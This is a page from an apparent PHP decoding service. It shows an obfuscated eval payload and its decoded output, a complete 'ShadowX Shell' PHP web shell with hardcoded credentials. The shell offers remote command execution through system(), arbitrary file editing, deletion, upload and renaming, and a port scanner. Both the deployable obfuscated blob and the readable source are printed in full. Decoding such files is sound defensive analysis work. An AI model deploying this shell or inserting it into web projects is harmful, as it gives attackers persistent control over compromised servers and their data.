Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
<?php $techgaun='eNrNWm1T4zgS/k4V/0HjYXGyS95gwkCCM8Uy4Zba2WGOMLt7RVGUsZVEi235ZIfAUvz365bkl..
Decoded Output download
?>b'<?php
$user = \'ExtremeAdmin\';
$pass = \'X4sRvRpWn3D5\';
$uselogin = 1;
?>
<title>ShadowX Shell</title>
<style>
#imageset{
margin-top: -386px;
z-index: 1;
}
</style>
<!DOCTYPE html>
<!--[if lt IE 7 ]> <html class="ie ie6 no-js" lang="en"> <![endif]-->
<!--[if IE 7 ]> <html class="ie ie7 no-js" lang="en"> <![endif]-->
<!--[if IE 8 ]> <html class="ie ie8 no-js" lang="en"> <![endif]-->
<!--[if IE 9 ]> <html class="ie ie9 no-js" lang="en"> <![endif]-->
<!--[if gt IE 9]><!--><html class=no-js lang=en><!--<![endif]-->
<head>
<meta charset=UTF-8 />
<meta http-equiv=X-UA-Compatible content="IE=edge,chrome=1">
<meta name=viewport content="width=device-width, initial-scale=1.0">
<meta name=author content=Codrops />
</head>
<body id=page>
<div class=container>
<div class=codrops-top>
</a>
<span class=right>
</a>
</span>
<div class=clr></div>
</div>
<header>
<p <html>
<head>
<meta http-equiv=Content-Type content="text/html; charset=ISO-8859-1">
<meta name=Keywords content="MIHT">
<link rel="shortcut icon" href="http://www.iconj.com/ico/u/5/u5oywrf99u.ico" type="image/x-icon"/>
</head>
<body style="color: #e55b00; background-color: #333333;">
<center><h3><font color="#e55b00;">* RESTRICTED AREA *</font></h3></center>
<?php
# ---------------------------------------#
# Authentication #
#----------------------------------------#
if ($uselogin ==1)
{
if($_COOKIE["user"] != $user or $_COOKIE["pass"] != md5($pass))
{
if($_POST[\'usrname\']==$user && $_POST[\'passwrd\']==$pass)
{print\'<script>document.cookie="user=\'.$_POST[\'usrname\'].\';";document.cookie="pass=\'.md5($_POST[\'passwrd\']).\';";</script>\';}
else
{
if($_POST[\'usrname\']){print\'<script>alert("Wrong Login Data.. Try Again...");</script>\';}
?>
<div id="loginform" class="" style=""><center>
<form method="POST" onSubmit="if(this.usrname.value==\'\'){return false;}" checked>
<br><input value="" title="username" data-rel="tooltip" id="username" name="usrname" size="30" maxlength="30" type="text" placeholder="Username" class="username" style="border:1px solid #e55b00; background-color: transparent; color: #e55b00; height: 30px; position: relative; z-index: 999;" onBlur="Blur(\'username\',\'userName\');" onClick="Clear(\'username\',\'userName\');" required><br><br><br>
<input value="" title="password" data-rel="tooltip" id="password" name="passwrd" size="30" maxlength="30" type="password" placeholder="Password" class="username" style="border:1px solid #e55b00; background-color: transparent; color: #e55b00; height: 30px; position: relative; z-index: 999;" onFocus="Focus(2);" required><br><br><br>
<input type="submit" value=" Login " name="login" style="border:2px solid #e55b00; background-color: transparent; color: #e55b00; width: 220px; height: 30px; position: relative; z-index:999;"><br>
</form></center></div>
</style>
<center>
<br><br><br><br><br><br><img border=0 src="http://img5.uploadhouse.com/fileuploads/16647/166472994aa3103e3728c103787d641e03c519cc.png" id="imageset" style="Opacity: 0.5;"> </img><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br>
</center>
<?php
exit;
}
}
}
?>
<!-- Qui Finisce la parte del Login -->
<html>
<head>
<title>ShadowX Shell</title>
</head>
<body>
<style type="text/css">
hr{
color: #FF6600;
background: #FF6600;
}
body{a
background: #e55b00;
color: #e55b00;
font-family: Verdana;
font-size: 11px;
}
a:link{
color: #e55b00;
}
a:visited{
color: #e55b00;
}
a:hover{
text-decoration: none;
Color: #e55b00;
}
table {
font-size: 11px;
}
</style>
<body style="background-color:#333333;">
<?
error_reporting (0);
set_time_limit (0);
if (empty ($_GET [\'dir\'])){
$dir = getcwd ();
}
else {
$dir = $_GET [\'dir\'];
}
chdir ($dir);
$current = $_SERVER [\'PHP_SELF\'] . "?dir=" . $dir;
echo "<center><h1>ShadowX Shell</h1></center><p><p>";
echo "<i>Server: " . $_SERVER [\'SERVER_NAME\'] . "<br>";
echo "Directory Corrente: " . getcwd () . "<br>";
echo "Software: " . $_SERVER [\'SERVER_SOFTWARE\'] . "<pre></pre></i>";
echo "<pre></pre>";
echo "<table width = 50%>";
echo "<tr>";
echo "<td><a href = \'".$current."&mode=system\'>Terminale</a></td>";
echo "<td><a href = \'".$current."&mode=create\'>Crea Nuovo File</a></td>";
echo "<td><a href = \'".$current."&mode=upload\'>Upload file</a></td>";
echo "<td><a href = \'".$current."&mode=port_scan\'>Scansione Porte</a></td>";
echo "</tr></table>";
echo "<pre></pre>";
$mode = $_GET [\'mode\'];
switch ($mode){
case \'edit\':
$file = $_GET [\'file\'];
$new = $_POST [\'new\'];
if (empty ($new)){
$fp = fopen ($file, "r");
$file_cont = fread ($fp, filesize ($file));
$file_cont = str_replace ("<textarea>", "</textarea>", $file_cont);
echo "<form action = \'".$current."&mode=edit&file=".$file."\' method = \'POST\'>";
echo "File: ". $file . "<br>";
echo "<textarea name = \'new\' rows = \'30\' cols = \'50\'>".$file_cont." </textarea><br>";
echo "<input type = \'submit\' value = \'Modifica\'></form>";
}
else {
$fp = fopen ($file, "w");
if (fwrite ($fp, $new)){
echo $file . " Modificato.<p>";
}
else {
echo "Impossibile Modificare " . $file . ".<p>";
}
}
fclose ($fp);
break;
case \'delete\':
$file = $_GET [\'file\'];
if (unlink ($file)){
echo $file . " Eliminato con successo.<p>";
}
else {
echo "Impossibile Eliminare " . $file . ".<p>";
}
break;
case \'copy\':
$src = $_GET [\'src\'];
$dst = $_POST [\'dst\'];
if (empty ($dst)){
echo "<form action = \'".$current . "&mode=copy&src=" . $src . "\' method = \'POST\'>";
echo "Destination: <input name = \'dst\'><br>";
echo "<input type = \'submit\' value = \'Copia\'></form>";
}
else {
if (copy ($src, $dst)){
echo "File copiato con successo.<p>";
}
else {
echo "Impossibile Copiare " . $src . ".<p>";
}
}
break;
case \'move\':
$src = $_GET [\'src\'];
$dst = $_POST [\'dst\'];
if (empty ($dst)){
echo "<form action = \'".$current . "&mode=move&src=" . $src . "\' method = \'POST\'>";
echo "Destination: <input name = \'dst\'><br>";
echo "<input type = \'submit\' value = \'Sposta\'></form>";
}
else {
if (rename ($src, $dst)){
echo "File Spostato .<p>";
}
else {
echo "Impossibile Spostare " . $src . ".<p>";
}
}
break;
case \'rename\':
$old = $_GET [\'old\'];
$new = $_POST [\'new\'];
if (empty ($new)){
echo "<form action = \'".$current . "&mode=rename&old=" . $old . "\' method = \'POST\'>";
echo "Nuovo nome: <input name = \'new\'><br>";
echo "<input type = \'submit\' value = \'Renomina\'></form>";
}
else {
if (rename ($old, $new)){
echo "File/Directory Rinominata con successo.<p>";
}
else {
echo "Impossibile Rinominare " . $old . ".<p>";
}
}
break;
case \'rmdir\':
$rm = $_GET [\'rm\'];
if (rmdir ($rm)){
echo "Directory remossa con successo.<p>";
}
else {
echo "Impossibile Rimuovere " . $rm . ".<p>";
}
break;
case \'system\':
$cmd = $_POST [\'cmd\'];
if (empty ($cmd)){
echo "<form action = \'".$current . "&mode=system\' method = \'POST\'>";
echo "Terminale: <input name = \'cmd\'>";
echo "<input type = \'submit\' value = \'Esegui\'></form><p>";
}
else {
system ($cmd);
}
break;
case \'create\':
$new = $_POST [\'new\'];
if (empty ($new)){
echo "<form action = \'".$current . "&mode=create\' method = \'POST\'>";
echo "<tr><td>Nuovo file: <input name = \'new\'></td>";
echo "<td><input type = \'submit\' value = \'Create\'></td></tr></form><p>";
}
else {
if ($fp = fopen ($new, "w")){
echo "File creato con successo.<p>";
}
else {
echo "Impossibile Creare ".$file.".<p>";
}
fclose ($fp);
}
break;
case \'upload\':
$temp = $_FILES[\'upload_file\'][\'tmp_name\'];
$file = basename($_FILES[\'upload_file\'][\'name\']);
if (empty ($file)){
echo "<form action = \'".$current . "&mode=upload\' method = \'POST\' ENCTYPE=\'multipart/form-data\'>";
echo "File Locale: <input type = \'file\' name = \'upload_file\'>";
echo "<input type = \'submit\' value = \'Upload\'>";
echo "</form><pre></pre>";
}
else {
if(move_uploaded_file($temp,$file)){
echo "File inserito con successo.<p>";
unlink ($temp);
}
else {
echo "Impossibile Inserire " . $file . ".<p>";
}
}
break;
case \'port_scan\':
$port_range = $_POST [\'port_range\'];
if (empty ($port_range)){
echo "<table><form action = \'".$current. "&mode=port_scan\' method = \'POST\'>";
echo "<tr><td><input type = \'text\' name = \'port_range\'></td><td>";
echo "Enter port range where you want to do port scan (ex.: 0:65535)</td></tr>";
echo "<tr><td><input type = \'submit\' value = \'Port Scan\'></td></tr></form></table>";
}
else {
$range = explode (":", $port_range);
if ((!is_numeric ($range [0])) or (!is_numeric ($range [1]))){
echo "Bad parameters.<br>";
}
else {
$host = \'localhost\';
$from = $range [0];
$to = $range [1];
echo "Open ports:<br>";
while ($from <= $to){
$var = 0;
$fp = fsockopen ($host, $from) or $var = 1;
if ($var == 0){
echo $from . "<br>";
}
$from++;
fclose ($fp);
}
}
}
break;
}
clearstatcache ();
echo "<pre></pre>";
echo "<table width = 100%>";
$files = scandir ($dir);
foreach ($files as $file){
if (is_file ($file)){
$size = round (filesize ($file) / 1024, 2);
echo "<tr><td>".$file."</td>";
echo "<td>".$size." KB</td>";
echo "<td><a href = ".$current . "&mode=edit&file=".$file.">Modifica</a></td>";
echo "<td><a href = ".$current . "&mode=delete&file=".$file.">Elimina</a></td>";
echo "<td><a href = ".$current . "&mode=copy&src=".$file.">Copia</a></td>";
echo "<td><a href = ".$current . "&mode=move&src=".$file.">Sposta</a></td>";
echo "<td><a href = ".$current . "&mode=rename&old=".$file.">Rinomina</a></td></tr>";
}
else {
$items = scandir ($file);
$items_num = count ($items) - 2;
echo "<tr><td>".$file."</td>";
echo "<td>".$items_num." Items</td>";
echo "<td><a href = ".$current . "/" . $file.">Cambia directory</a></td>";
echo "<td><a href = ".$current . "&mode=rmdir&rm=".$file.">Elimina directory</a></td>";
echo "<td><a href = ".$current . "&mode=rename&old=".$file.">Rinomina directory</a></td></tr>";
}
}
echo "</table>";
?>
</body>
</html>
'Did this file decode correctly?
Original Code
<?php $techgaun='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';eval('?>'.gzuncompress(base64_decode($techgaun)));?>Function Calls
| gzuncompress | 1 |
| base64_decode | 1 |
Stats
| MD5 | 07a917b9bce496a6501b6223e9514f4f |
| Eval Count | 1 |
| Decode Time | 77 ms |